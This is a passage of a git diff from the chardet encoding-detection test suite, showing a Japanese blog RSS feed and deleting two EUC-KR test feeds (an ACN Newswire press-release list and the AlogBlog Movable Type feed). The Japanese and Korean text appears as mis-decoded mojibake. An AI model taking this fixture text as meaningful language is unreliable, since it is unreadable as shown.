Brain₪ָ₪«Kaiba₪ָ₪«¡¢¡ײַ¾¡׳₪ֻ₪³₪ְ₪ן₪ֳ₪¿¥ֽ¡¼¥¥ף¥°₪¬ַּּע₪₪₪₪ָ»׳₪₪₪₪·₪¿¡£ ¥ײ¥ֳ¥¯¥¡¼¥¯₪ג¡ײ÷¸ַ¾¡׳₪¬¡ײ¥«¥ֶ¥´¥ך¡׳¡¢¡ײ±¦ַ¾¡׳₪¬¡ײ¥¿¥°¡׳₪ַ¬־א₪µ₪ל¡¢¥¥¿₪ֻ₪÷₪י¡ֱ₪ֳ₪ָ₪ײ₪י²¼₪²₪י₪ל₪כ₪־₪¬·ש₪₪₪»ה₪ֻ₪ֿ₪ֱ₪ח₪ֳ₪ָ´ע₪·₪₪₪ַ₪¹¡£ MyKaiba¡¼«¬₪־¥ײ¥ֳ¥¯¥¡¼¥¯¡ֻ₪״₪־ֵ׀ֿ¿₪ג´ֳ±₪ֻ₪ַ₪­₪₪¹¡£... -Web -₪ז₪­ֻ· -2005-05-30T21:38:28+09:00 - - -¥ױ¥£¥כ¥א₪־ֶָ¥¢¥°¥ױ¥¢ַֻ»÷ -http://yukiboh.moo.jp/weblog/archives/000534.html -₪ָ₪³₪ם₪ַAGFA₪־¼ּׂ¾₪־ֶֻ¸לֹ½µ­₪ֿ¡¢ְµ₪·₪¯₪ֿ¡ײ¥¢¥°¥ױ¥¢¡׳₪ַ₪¹₪ֽ¡£ -ֻ¿ֲח¼ך¿·¹¼ׂ₪¬¡ײ¥¢¥°¥ױ¥¡¡׳₪ָ½ס₪₪₪ֶ₪₪·₪¿₪±₪ֹ¡ִ -₪½₪־²ס¼ׂ₪¬¥µ¥₪¥ָ₪ַ¡ײ¥¢¥°¥ױ¥¢¡׳₪ָֹ½µ­₪·₪ֶ₪₪₪כ°¾ו¡¢ָ¯²»₪־²ִָ₪ֿ₪ֹ₪¦₪¢₪ל¡¢₪½₪ֱ₪י₪ֻ½א₪÷₪כ₪₪­₪ָ»׳₪¦₪־₪ַ₪¹₪¬¡ִ₪₪ף₪ָ₪גָשּ¯₪ַ₪¹₪ֽ¡£ -¡ײ¥­¥ה¥־¥ף¡׳₪ע¡ײ¥­¥ד¥־¥ף¡׳₪ָ½ס₪₪₪ֶ₪כ¥µ¥₪¥ָ₪ג₪¢₪ך₪₪¹₪¬¡¢₪³₪־₪¢₪¿₪ך₪ֶֻֿ¸ל₪־₪ה₪ה₪³₪·₪₪₪ָ₪³₪ם₪ַ₪¹₪ֽ¡£ -photo -₪ז₪­ֻ· -2005-05-29T11:40:24+09:00 - - -¡¿ֳַַ¡־ר°¦ַ½־ֿ»״¿פ¥ֶ¥¹¥ָ -http://yukiboh.moo.jp/weblog/archives/000533.html -־ר°¦ַ½־ֿ»״¿פ¥ֶ¥¹¥ָ -₪ע₪ה₪ֳ₪ֶ₪₪¿¡£]]> -quiz -₪ז₪­ֻ· -2005-04-03T13:41:42+09:00 - - -¥¨¥₪¥׳¥ך¥כ¥ױ¡¼¥כ´כ²ט¥ג¥־ -http://yukiboh.moo.jp/weblog/archives/000532.html -₪ֹ₪³₪₪ֳַµ₪»₪כ₪«₪ן₪«₪ך₪₪»₪ף₪¬¡¢₪ָ₪ך₪¢₪¨₪÷¡ִ ¡¦Food Meter ¡¦£²₪ֱ₪ד₪ף₪ֽ₪י¸‏₪±₪־¿·¥ֹ¥ב¥₪¥ף¡ײ.orz¡׳₪¬±¿ֽׁ³«»ֿ ¡¦ ">¡ײ¥¯¥ך¥ֳ¥¯₪¹₪כ₪ָ³ֲָח¡׳¥׃¥¸¥ֽ¥¹¥ג¥ַ¥כֳֶµצְ®־©₪ַ³ֶ¼ֲׂ׀±‏₪ִֹֻ₪ן₪ל₪כ ¡¦¥״¥µ¥הֲחֶֻֿ²¡¢ֶֻ¸ל¥ֹ¥ב¥₪¥ף¡ײ₪ֲ.jp¡׳₪ע¿½ְֱ ¡¦¥ֹ¥¢¥¹¥... -Web -₪ז₪­ֻ· -2005-04-01T06:55:36+09:00 - - -₪¢₪₪¿₪¬₪ִ₪ײ₪ה₪¯÷ַ´₪־¸ְֽױ -http://yukiboh.moo.jp/weblog/archives/000531.html -¢£₪¢₪₪¿₪¬₪ִ₪ײ₪ה₪¯÷ַ´₪־¸ְֽױ ₪ע₪ה₪ֳ₪ֶ₪₪₪·₪¿¡£ ₪¢₪₪¿₪¬₪ִ₪ײ₪ה₪¯÷ַ´₪־¸ְֽױ₪ֿ¡¡÷£₪₪ֵַֻצ₪ֻ₪¢₪ך₪¬₪ָ₪¦¡¡₪ַ₪¹¡£ ְ®¾כ₪־¼«ֲנ₪ֻ₪ֶ¡¢ֹ׳¡¢»ׂ¶¡¡¢₪½₪·₪ֶ°¦¿ֽ₪ֻ₪₪ָ₪י₪ל₪₪¬₪י...¡¿הִךַ¯־ב¡§68÷׀¡ֻ ₪ֹ₪ל₪ג₪³₪ל₪ג₪¢₪ךְֶ₪₪₪ְִך₪ְ₪±₪ֹ¡¾׀¡ֻ ÷ַ´₪ֻ¡ײ÷£₪₪ֵַֻצ₪ֻ₪¢₪ך₪¬₪ָ₪¦¡׳₪ָ¸ְ₪¨₪כ¿ֽ₪¬₪½₪׀₪ֻ₪₪₪ֶ₪¯₪ל₪¿₪י÷ַ¹ג₪ַ₪¹₪ֽ₪§¡£ ₪¢₪₪¿₪־ֱם¹ח±¿¡§¡ת¡ת¡ת¡ת ₪¢₪₪¿₪ֿ¡¢ֱןְּ₪µ₪ָ¶¯₪₪°ױ»ײ¡¢¿ֲֽ₪₪ֿ₪÷₪ל₪¿¹װֶ°־ֿ₪ע»‎₪ֳ₪ֶ₪₪₪כ¿ֽ₪ַ₪¹¡£¿ֽ₪־¾ו₪ֻ־©₪ֱ¡¢ְ®¸ש₪ע·ֱ₪ֻ₪ַ₪­₪כ־ֿ₪ע₪ג₪ֳ₪ֶ₪₪₪₪¹¡£₪·₪«₪·¡¢¥׳¥י¥₪¥ֹ₪־¹ג₪₪₪ָ₪³₪ם₪¬₪¢₪ך¡¢₪ָ₪­₪ָ₪·₪ֶ₪¢₪₪¿₪־¹ֽ₪¨₪עֽ‎ְֿ₪ְָ×₪₪₪ֱַך¼ך₪ֻּµֽ‎ּנֽ‎²¡₪·₪ִ₪±₪ֶ₪·₪₪¦»צ₪ג¡£₪ט₪¯₪₪₪₪ַ₪¹₪ֽ¡£ ₪½₪ף₪₪¢₪₪¿₪־÷ַ´₪ֿ₪¢₪כֱֶֶֽ³₪ה₪ֳ₪ֶ₪­₪₪¹¡£ָ‏¿©²ָµ₪¼ט₪ך₪־¿©ְ¸³ט₪¬÷ׂ₪₪₪·₪ֶ¸₪₪־»¶גֳז¡°¦¿ֽ₪ָ¡ֱֶֻֽ³°ױ¼±ֹװְּ₪ֻ¡£±ף₪־₪¯°ױ¼±₪־ֳז¡¢ֹ׳¡¢»ׂ¶¡¡¢₪½₪·₪ֶ°¦¿ֽ₪־´י₪ע¸«ֵֿ₪·₪¢₪₪¿₪ֿ₪³₪¦₪ִ₪ײ₪ה₪­₪₪¹¡£¡״÷£₪₪ֵַֻצ₪ֻ₪¢₪ך₪¬₪ָ₪¦¡¡¡ֽ¾·׳₪₪×ְ₪ֳֿ₪«₪ג₪·₪ל₪₪»₪ף₪¬°ה½ס¡ֳֶ₪ֻ»ס»÷₪₪ן₪ך¡ֻ₪ְֿ¸ֱ°₪ֻ¸זֽׁ°ױ₪ע₪ָ¡£ ְ®¸ש¡ִ₪¹₪כ₪ָ₪₪₪₪₪₪¡¡£¡²¿₪¬₪«ֳ־₪י₪₪₪₪±₪ֹ¡ֻ ₪¢₪₪¿₪־»ֵ»צ±¿¡§¡ת¡ת¡ת¡ת¡ת ¸‏¾ו¿´₪־¶¯₪₪₪¢₪₪¿₪ֿ¡¢ְױַ₪₪¢₪כ־©¾ל₪ֻ₪×₪«₪ל₪כ₪³₪ָ₪ַ¹¹₪ֻ₪ֲֻח₪₪₪₪כ·כ²ּ₪ע»ִ₪»₪כ¿ֽ₪ַ₪¹¡£₪₪₪ן₪ז₪כ½ק¼ִׂ¹¥¿¥₪¥׳₪ַ₪¹¡£₪¢₪₪¿¼«¿ָ₪¬ֳז¿´₪ָ₪₪ֳ₪ֶ»ֵ»צ₪ע₪ַ₪­₪כ´ִ¶­₪ֵ₪¯₪ך₪ע¹ֽ₪¨₪ֶ₪₪כ₪־₪ג₪ט₪₪₪ַ₪·₪ח₪¦¡£µ¯¶ָ₪¹₪כ₪־₪ַ₪¢₪ל₪׀ְ®¸ש₪ַ₪­₪½₪¦₪ַ₪¹¡£₪·₪«₪·¡¢ֹ¬ֽ׳°¾ו₪־¥׳¥י¥₪¥ֹ₪¬µ״₪ָ₪₪ך¡¢¿ֽ₪־°ױ¸«₪ֻ¼×₪עֲ₪µ₪÷¡¢·כ²ּ¡¢¼ךִֻ₪₪»ֲֵַ₪ֱ₪ע¾·₪¯₪³₪ָ₪ג¡£»‏₪ֻ₪ֱֿך¼ך₪־°ױ¸«₪עֱִַ¾₪ֻ¼ץ₪±ֶ‏₪ל¡¢¹­₪₪»כְֵ₪ַ×»צ₪ע¸«₪ִ₪ב₪ֶ₪₪כ₪³₪ָ₪ע₪×ֻ÷₪ל₪₪¯¡£ µ¯¶ָ₪ַ₪¹₪«₪¡¡£₪¦¡ֱ₪ף...₪ֹ₪¦₪₪ף₪ְ₪ם¡© ₪¢₪₪¿₪־¶גֱ¬±¿¡§¡ת¡ת¡ת ₪¢₪₪¿₪ֿ₪×¶ג₪־½׀ֶ‏₪ך₪־·ד₪·₪₪ְ±²ף₪ך₪ָ¸ְ₪¨₪₪¹¡£ֲח¶ג₪ע¼ך₪ֻ₪¹₪כ²ִַ½ְ­₪גֲח₪­₪₪₪ַ₪¹₪¬¡¢ֶ±»‏₪ֻ½׀₪ֶ₪₪₪¯₪×¶ג₪ג¾¯₪₪¯₪¢₪ך₪₪»₪ף¡£₪·₪«₪·¡¢¸ז¿´ַ₪₪¯¡£÷ַ½×ֵ×₪ֻ₪ֿ₪¢₪₪¿₪־₪ָ₪³₪ם₪ֻ₪×¶ג₪ּֿב₪ֳ₪ֶ₪¯₪כ₪ַ₪·₪ח₪¦¡£₪½₪ל₪ַ¡¢ְ®¾כ₪ֻ₪ַ₪ג²ָ₪ע·ת₪ֶ₪ֶ₪₪ֶ²¼₪µ₪₪¡£¥¥₪¥¡¼¥א¡קְ®¾כ¡¢₪₪₪₪₪ַ₪¹₪ֽ¡£₪¿₪ְ¡¢₪ה₪ֿ₪ךֲח₪­₪ֵך»ס₪ע₪¹₪כ»‏₪ֿ¿µ½ֵ₪ֻ¹ֽ₪¨₪ֶ₪«₪י¹װ₪¦₪³₪ָ₪ע₪×´«₪ב₪·₪₪¹¡£ ֲח₪­₪ֵך»ס¡ִ¡²|¡±|¡ ₪¢₪₪¿₪־־ר°¦±¿¡§¡ת¡ת¡ת¡ת 30ֲו¸וָ¾₪¢₪¿₪ך₪«₪י₪¢₪₪¿₪־¿ֽµ₪₪¬µ¾ו¾÷¡×₪¢₪₪¿₪¬₪ג₪ֶ₪ֶ₪₪₪כ₪־₪«¡¢₪½₪ל₪ָ₪ג₪¢₪₪¿₪־₪×¶ג₪¬₪ג₪ֶ₪ֶ₪₪₪כ₪־₪«¬₪«₪ך₪₪»₪ף₪¬¡¢₪¢₪₪¿₪ְֳֻֿ­₪ֹֻװ¼«ֽ³₪¹₪כ₪³₪ָ₪¬₪₪₪₪ַ₪·₪ח₪¦¡£₪½₪ף₪ָ‏ּ£₪·₪₪»‏´ײ₪עֻ‏µ₪¹₪כ₪־₪ג°ל¶½₪ַ₪¹₪¬¡¢₪¢₪₪¿₪ֻ₪ָ₪ֳ₪ֵֶֻצ₪ֲֻחְ₪¿ֽ₪ֳֿ¯₪«₪ָ₪₪₪¦₪³₪ָ₪ע¸«¼÷₪ן₪₪₪₪ט₪¦₪ֻ¡£ ₪×¶ג₪ֿ₪₪₪₪־₪ַ¡ִ₪ג₪ֶ₪₪»₪ף₪ֽ₪§¡£... -quiz -₪ז₪­ֻ· -2005-03-28T22:29:47+09:00 - - -mixi₪־IDָײ¹ז₪ְ₪±₪ַ₪½₪־¿ֽ₪־¥¡¼¥¸₪ֻ¥¸¥ד¥ף¥׳ -http://yukiboh.moo.jp/weblog/archives/000530.html -₪₪ן₪ך₪ֻmixi¥ז¡¼¥¶¡¼₪¬ֱ‎₪¨₪ֶ₪­₪₪·₪¿¡£ -mixi·ׂ₪¬₪ך₪¸₪ד₪₪₪¿ֽ₪ָ²ס₪ֳ₪ֶmixi₪־ֲֳֿך₪ֻ₪₪כ₪³₪ָ₪ג₪·₪׀₪·₪׀¡£ -₪½₪ם₪½₪םּ¾»ֹ₪ֻmixi₪הSkype₪־ID₪ע¡¢ֿ¢ֽםְט₪ָ₪·₪ֶֶ‏₪ל₪ֶ₪₪ט₪¦₪«₪₪¡₪₪ף₪ֶ»׳₪ֳ₪¿₪ך₪·₪ֶ₪₪¹¡£ -sns -₪ז₪­ֻ· -2005-01-21T20:14:43+09:00 - - -livedoor¥ױ¥ל¥ף¥ֹ¥ׁ¡¼¥¯ -http://yukiboh.moo.jp/weblog/archives/000529.html -http://fp.livedoor.com/pr/ -₪ֻ»²²ֳ₪·₪₪·₪¿¡£]]> -sns -₪ז₪­ֻ· -2005-01-18T23:23:16+09:00 - - -ְ«ּ¾ָ½ֳַ¡¡Ver4.0 -http://yukiboh.moo.jp/weblog/archives/000528.html -ְ«ּ¾ָ½ֳַ₪ע¸«₪«₪±₪¿₪־₪ַ₪ה₪ֳ₪ֶ₪₪₪·₪¿¡£ ¢£ְ«ּ¾ָ½ֳַ¡¡Ver4.0 http://ucgi.3u.com/cgi-win/seimei/seimei.dll/form ·כ²ּ₪ֿ¡ִ ₪¦¡ֱ₪ף¡¢₪¢₪ף₪₪ךֵצ₪¿₪ֳ₪ֶ₪₪₪µ₪₪ג₪·₪₪¹₪¬¡¾׀¡ֻ... -quiz -₪ז₪­ֻ· -2004-12-22T09:22:52+09:00 - - -feed meter₪ִ₪±₪ֶ₪₪₪·₪¿ -http://yukiboh.moo.jp/weblog/archives/000527.html -coofish blog₪µ₪ף₪־µ­»צfeed meter₪ֳַ־₪ֳ₪¿http://feedmeter.net/index.php₪ע¥µ¥₪¥ֹ¥׀¡¼₪ֻ₪ִ₪±₪ֶ₪₪₪·₪¿¡£ ₪ס©¡ײBloglines₪ַ¹״ֶֹ¡׳₪₪ף₪ֶ₪¢₪כ₪־₪ַ₪¹₪ֽ¡£ ₪₪¹₪¬₪₪₪עBloglines₪ַ¹״ֶֹ ₪ָ₪«₪₪₪¦₪ױ₪¦₪ֻ»ָ₪¨₪׀₪₪₪₪₪־₪«₪¡£... -blog -₪ז₪­ֻ· -2004-12-16T14:21:21+09:00 - - -ְֵֽ÷ְך₪₪ -http://yukiboh.moo.jp/weblog/archives/000526.html -¢£ְֵֽ÷ְך₪₪ ¡¡http://www.twin.ne.jp/~eiri/yousei/ ₪ָ₪₪₪¦₪־₪ע¸«₪ִ₪±₪¿₪־₪ַ¡¢₪ה₪ֳ₪ֶ₪₪₪·₪¿¡£ ·כ²ּ₪ֿ¡¢ֽ₪ך₪־ְֵֽ÷₪ַ₪·₪¿¡ֱ¡£... -quiz -₪ז₪­ֻ· -2004-12-11T09:23:12+09:00 - - -¥¯¥ך¥¹¥¥¹־רְך₪₪ -http://yukiboh.moo.jp/weblog/archives/000525.html -¢£Yahoo!ְך₪₪ - ¥¯¥ך¥¹¥¥¹₪־־רְך₪₪ֳֶ½¸ -¡¡ -ְ¸ַ¯·מֶ₪עֶ‏₪ל₪ֶ£ַ£ן¡×£ַ£ן¡× -₪ֿ₪ֶ₪µ₪ֶ¡¢¥ן¥¿¥¯¥·₪־·כ²ּ₪ֿ¡ִ - -¡÷°¡¡¥י¥װ¥¹¥י¥÷¥ך₪־ֵ·»ָ¡ -₪ַ₪·₪¿¡ֱ -quiz -₪ז₪­ֻ· -2004-12-10T16:20:09+09:00 - - -PAIPO READER -http://yukiboh.moo.jp/weblog/archives/000524.html - PAIPO READER₪¬ֻ³ֵ×RSS¥ך¡¼¥ְ¡¼₪ָ₪·₪ֶ¥׀¡¼¥¸¥ח¥ף¥¢¥ֳ¥׳₪·₪¿₪ט₪¦₪ַ₪¹₪ֽ¡£]]> -Web -₪ז₪­ֻ· -2004-12-08T09:00:40+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-KR/acnnewswire.net.xml b/chardet/tests/EUC-KR/acnnewswire.net.xml deleted file mode 100644 index cc2304a..0000000 --- a/chardet/tests/EUC-KR/acnnewswire.net.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -Asia Corporate Press via ACNNewswire.nethttp://home.acnnewswire.netAsia Corporate News Network Pressen-usCopyright 2005, ACN Newswirecorp@asiacorpnet.comtim.mckinnon@asiacorpnet.comSat, 31 Dec 2005 13:47:03+0900Sat, 31 Dec 2005 13:47:03+0900Asia Corporate News Networkhttp://www.asiacorpnet.com/images/acnlogo.jpghttp://home.acnnewswire.net6019Asia Corporate News NetworkJCB°¡ China UnionPay¿ֽ ATM ְּ¿כ °ט¾אְ» ֳ¼°ב; CUP ִ«µוָ¸¿רµיְ÷ ְֱּ¦ ְֿ÷»¿¡¼­ ֳײְֳַ ATM ³׳ֶ®¿צֵ©¸¦ »ח¿כַׂ¼צ ְײ°װµָ´.http://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29790tim.mckinnon@japancorp.net (Tim Mckinnon)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29790Tue, 27 Dec 2005 13:30:33+0900NTT DoCoMo, Aplix¿¡ ֵץְhttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29787tim.mckinnon@japancorp.net (Tim Mckinnon)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29787Thu, 1 Dec 2005 16:38:13+0900NTT DoCoMo, ACCESS ֱײ½ִ ֳ°¡ ¸ְֵװhttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29786tim.mckinnon@japancorp.net (Tim Mckinnon)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29786Thu, 1 Dec 2005 14:59:15+0900ִל¼¼¶ףְַ CX3225SB ¼±ְ - ¼¼°ט¿¡¼­ °¡ְו ְְ÷ 4MHz ֱײִֶ¼צ ¼®¿µ ֵ©¸®½÷ֵ» ְ¯´ײhttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29780tim.mckinnon@japancorp.net (Tim Mckinnon)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29780Wed, 12 Oct 2005 13:53:15+0900IR(ֵץְָ«÷¸) ¸ֵ°ֱֵר ָ£ֱײ ¾מ¿צµו - BHP, ANZְ÷ַא, Babcock & Brown, Coates Hire ±׳¸®°ם ¸ִֵג¾מ¸® ְ÷ַא µמ¿¡°װ ¼צ¿©http://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29778tim.mckinnon@japancorp.net (Tim Mckinnon)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29778Fri, 7 Oct 2005 15:04:26+0900SAI-Global Limited (ASX: SAI)»ח ¼ֱֶַׂ®¿‏¾מ ְחֶַ¸ֵ ½ְֳו ֱרְװ<BR />http://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29777tim.mckinnon@japancorp.net (Tim Mckinnon)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29777Mon, 26 Sept 2005 21:46:23+0900ָ£ֱײ ֵץְָ«÷¸(IR) ¸ֵ°ֱֵר ½ֳ»ף½ִ9¿ש 21ְֿ °³¸·http://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29776tim.mckinnon@japancorp.net (Tim Mckinnon)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29776Thu, 15 Sept 2005 18:13:46+0900JCN ´÷½÷¿ְּֽ¾מ, ְֿ÷»¾מֶַ ÷¸µµ ְ·ב¿ֽ ±ְ¶ °ר°³ ÷¸± ¼­÷ס½÷ ¹ַ¥.http://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29771newsroom@japancorp.net (Andrew Wilcox)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_k&Art_ID=29771Thu, 21 July 2005 14:00:00+0900 \ No newline at end of file diff --git a/chardet/tests/EUC-KR/alogblog.com.xml b/chardet/tests/EUC-KR/alogblog.com.xml deleted file mode 100644 index a3c423e..0000000 --- a/chardet/tests/EUC-KR/alogblog.com.xml +++ /dev/null @@ -1,141 +0,0 @@ - - - - -AlogBlog -http://alogblog.com/blog/ - -ko -Copyright 2005 -Thu, 11 Nov 2004 21:41:39 +0900 -Wed, 28 Dec 2005 19:38:51 +0900 -http://www.movabletype.org/?v=3.0D -http://blogs.law.harvard.edu/tech/rss - - -EUC-KR ¿¡¼­ TypeKey ַׁ±´׀³׳ְ׃ ַ¥½ֳַֿ±ג -TypeKey ½ֳ½÷ְֵּ UTF-8·־ µ¹¾ֶ°¡´ֲµ¥, °ֵ±ג¼­ ַׁ±·־ µָ ´׀³׳ְ׃ְ» ֱ₪ַׂ °ז¿ל¿¡, EUC-KR·־ µָ ¹«¹צ÷םֵ¸ְװ ÷ם·ֿ¿¡¼± ¸®´ְּ·÷ֶ®µַ¾מ ְ¼µַ¾מ¿ְ´ֲ ´׀³׳ְ׃ְּ UTF¶ף ´ח¿¬ָק ±ת¾מֱ® ³×ֵ¸³­´. ½ֱַ¦ ÷ם·ֿ µמ¿¡¼­ »ח¿כַֿ´ֲ ַ¸ם ³»ֱצ´ֲ ´׀³׳ְ׃ְ÷ ַׁ±·־ »ח¿כַֿ´ֲ ¸¹ְ÷ ÷׀µיµµ ֵ¸ְװֵ°¿¡¼­ְַ ´׀³׳ְ׃ְ÷ ְּ·± ¹®ֱ¦¶§¹®¿¡ ¿ן¸ח°ְ¸װ±ג·־ ¿µ¾מ·־ ֱ‏°ם ְײ´.... -http://alogblog.com/blog/archives/2004/11/EUCKR_¿¡¼­_TypeKey_ַׁ±´׀³׳ְ׃_ַ¥½ֳַֿ±ג.php -http://alogblog.com/blog/archives/2004/11/EUCKR_¿¡¼­_TypeKey_ַׁ±´׀³׳ְ׃_ַ¥½ֳַֿ±ג.php -MovableType -Thu, 11 Nov 2004 21:41:39 +0900 - - -¹«¹צ÷םֵ¸ְװ¿¡¼­ Login ID ¿ְָֿק ¼±ג±ג -¸¸¾א ´©±÷°¡°¡ ְ½ְֵַ ¹«¹צ÷םֵ¸ְװ ¸ְ־ ¸´÷·־ ·־±׳ְ־ַ״ µי¾מ¿ֲ´¸י, ¾מ¶² ְְּֿ ¹ת¾מֱת±מ? ±׳³ֹ ֳֵַ¸´ µמ¸¸ ֱ¶¿כָק ±¸°זַֿ°ם ³×°¥±מ? ¾ֶ´ֿ¸י ְּ¿ױ µי¾מ¿ֲ ±ט¿¡...ַֿ¸י¼­ ¸נµח ¿£ֶ®¸®¸¦ ½ֿ ֱצ¿ל´ֲ ¸¸ַאְ» ְתֱצ¸£°ם ³×°¥ °¡´ֹ¼÷ְּ ´ץ ֵ¬±מ? °³ְ־ְְ¸·־ ÷¸¸י, ±µµ ¾ֶ±ץֱצ¸¸ ¾ײ½ב ¸¸µח ֳֵַ¸´µµ ¼ֱַֿׂ´.ְ‎´כ ְּ·±... -http://alogblog.com/blog/archives/2004/11/¹«¹צ÷םֵ¸ְװ¿¡¼­_Login_ID_¿ְָֿק_¼±ג±ג.php -http://alogblog.com/blog/archives/2004/11/¹«¹צ÷םֵ¸ְװ¿¡¼­_Login_ID_¿ְָֿק_¼±ג±ג.php -MovableType -Wed, 10 Nov 2004 21:15:17 +0900 - - -UTF-8 ְ־ִµשַֿ¿¡¼­ °³÷°¿£ֶ®¸® ְִֶֿ¸ם ַׁ±·־ ¸¸µי±ג - -http://alogblog.com/blog/archives/2004/11/UTF8_ְ־ִµשַֿ¿¡¼­_°³÷°¿£ֶ®¸®_ְִֶֿ¸ם_ַׁ±·־_¸¸µי±ג.php -http://alogblog.com/blog/archives/2004/11/UTF8_ְ־ִµשַֿ¿¡¼­_°³÷°¿£ֶ®¸®_ְִֶֿ¸ם_ַׁ±·־_¸¸µי±ג.php -MovableType -Sat, 06 Nov 2004 21:34:10 +0900 - - -¹«¸׃÷םֵ¸ְװ¿¡¼­ ִ¸אֶ® ½÷ֶװ·־÷¿ ¿ױµ½ֳֵ°±ג -CCode - ִ¸אֶ® ½÷ֶװ ¹זֱצ ֳַ·¯±׳ְ־ ¾ֶ·¡ ³»¿כְ÷ ¼ׂ½÷¸¦ ֱקֱ¢ ¼צֱ₪ַֿ´ֲ ַ(Hack)¹ז½ְִװ´ֿ´. ְ§ ¸µֵ©¿¡ ְײ´ֲ ֳַ·°ְ־ְ» ְּ¿כַֿ¼¼¿ה.÷ם·ְּֿ ָ°¼÷ָ­µַ°ם ÷°µµְַ ְ־ֱץְ‎ֲק¾רְּ ִ¸אֶ®°¡ °¡´ַֹׁ ָ¯°זְּ ¸¹¾ֱֶ¿¡ µ¶ף, ִ¸אֶ®¸¦ °¡ְוַׁ ½÷ֶװְּ ָ°°³¸¦ ִ¡±ג ½ְֳַ´. ְּ¿¡ ´כַׁ ¸¹ְ÷ ´כֳ¥ְּ ְײֱצ¸¸, °£´ַׁ ¹ז¹‎ְ¸·־ ½÷ֶװ÷¿ְַ ֶקְ§¸ְֱ»... -http://alogblog.com/blog/archives/2004/11/¹«¸׃÷םֵ¸ְװ¿¡¼­_ִ¸אֶ®_½÷ֶװ·־÷¿_¿ױµ½ֳֵ°±ג.php -http://alogblog.com/blog/archives/2004/11/¹«¸׃÷םֵ¸ְװ¿¡¼­_ִ¸אֶ®_½÷ֶװ·־÷¿_¿ױµ½ֳֵ°±ג.php -MovableType -Thu, 04 Nov 2004 20:08:34 +0900 - - -iconv¸¦ ְּ¿כַׁ ַׁ± URL ÷¯ָ¯ ¹ז¹‎ - -http://alogblog.com/blog/archives/2004/11/iconv¸¦_ְּ¿כַׁ_ַׁ±_URL_÷¯ָ¯_¹ז¹‎.php -http://alogblog.com/blog/archives/2004/11/iconv¸¦_ְּ¿כַׁ_ַׁ±_URL_÷¯ָ¯_¹ז¹‎.php -MovableType -Tue, 02 Nov 2004 19:13:23 +0900 - - -´÷ףִ¡ִµו ¿µ´¾מ 51ְו÷־ֵֽ ³¡±מֱצ -Chapter 1 ~ Chapter 50°¢ ֳ©ֵֽ÷°·־ ֱ÷¹µַ´ֲ ´¾מ°¡ ¸¹¾ֶ¼­ ½ֱַ¦´ֲ ¹ ְַּֿ·־ »ץ ´¾מ°¡ ֱ¾מµח´.... -http://alogblog.com/blog/archives/2004/10/´÷ףִ¡ִµו_¿µ´¾מ_51ְו÷־ֵֽ_³¡±מֱצ.php -http://alogblog.com/blog/archives/2004/10/´÷ףִ¡ִµו_¿µ´¾מ_51ְו÷־ֵֽ_³¡±מֱצ.php -ְּ·± ְת·± -Sun, 31 Oct 2004 14:10:46 +0900 - - -The Da Vinci Code Vocabularies -´÷ףִ¡ ִµו ¿ר¼­¿¡ ³×¿ְ´ֲ °³ְ־ְְ¸·־ »ץ·־¿מ ´¾מµיְ» °¢ ´כ·« ´¼¸ ֳ©ֵֽ÷°·־ ¸נ¾ֶ¼­ ֱ₪¸®ַ״ µ׀´.¿ר¼­¸¦ ְ׀ְ» °ז¿ל ³×ֳ³·³ ´¾מ¸¦ ¸¹ְּ ¸נ¸£°ם ¶ַ ַֿµµ ¿ְ·¡µַ¼­ °¡¹°°¡¹°ַׁ °ז¿ל¿¡ ְֲ¸·־ ¹ר°ֵ·׃±ג °ֱֵצ^^¾ר´. ¹°·׀ ¸נ¸£´ֲ ´¾מ´ֲ ´כ·« ¾מ¸²ְ¸·־ ַ״¼®ַֿ°ם ½÷ֱֳִצ³×°¥·ֱ°ם ֱַֿצ¸¸, ¿צ³«¿¡ ¸נ¸£´ֲ ´¾מ°¡ ¸¹°ם... -http://alogblog.com/blog/archives/2004/10/The_Da_Vinci_Code_Vocabularies.php -http://alogblog.com/blog/archives/2004/10/The_Da_Vinci_Code_Vocabularies.php -ְּ·± ְת·± -Sat, 30 Oct 2004 15:41:08 +0900 - - -½÷ֶװ·־÷¿ְ» ַַַֿ´ֲ email ַ¥½ֳ ¹ז¹‎ ֱ₪¸® - -http://alogblog.com/blog/archives/2004/10/½÷ֶװ·־÷¿ְ»_ַַַֿ´ֲ_email_ַ¥½ֳ_¹ז¹‎_ֱ₪¸®.php -http://alogblog.com/blog/archives/2004/10/½÷ֶװ·־÷¿ְ»_ַַַֿ´ֲ_email_ַ¥½ֳ_¹ז¹‎_ֱ₪¸®.php -IT -Fri, 29 Oct 2004 22:28:52 +0900 - - -YaBB ֶק·³ְַ email ¿ה±¸¸¦ URL·־ ÷¯°ז -ְּ°ק ¾ֻ·ֿ÷ם·ֿ ֶק·ׂ¿¡¼± »ח¿כְ µמ·ְֿ» »ח¾חַֿ°ם ְײ´. ְְּ¯´ֲ »ח¿כְ µמ·ֿ¿¡ °°טµָ ֱ₪÷¸¸¦ ֳז½ַָק ÷¸ָ£ַׂ ְ½ֵµµ ¾רְ» »׃´ץ·¯, °³ְ־ ÷ם·ֿ¿¡ ¼³ִ¡ַׁ ֶק·³¿¡ ±׳·± ֱ₪÷¸µמ·ְֿ» ¿ה±¸ַֿ´ֲ°װ ¹ר°ֵ·׃°װ ÷¸¿©¼­ְּ´.±׳·¡¼­ 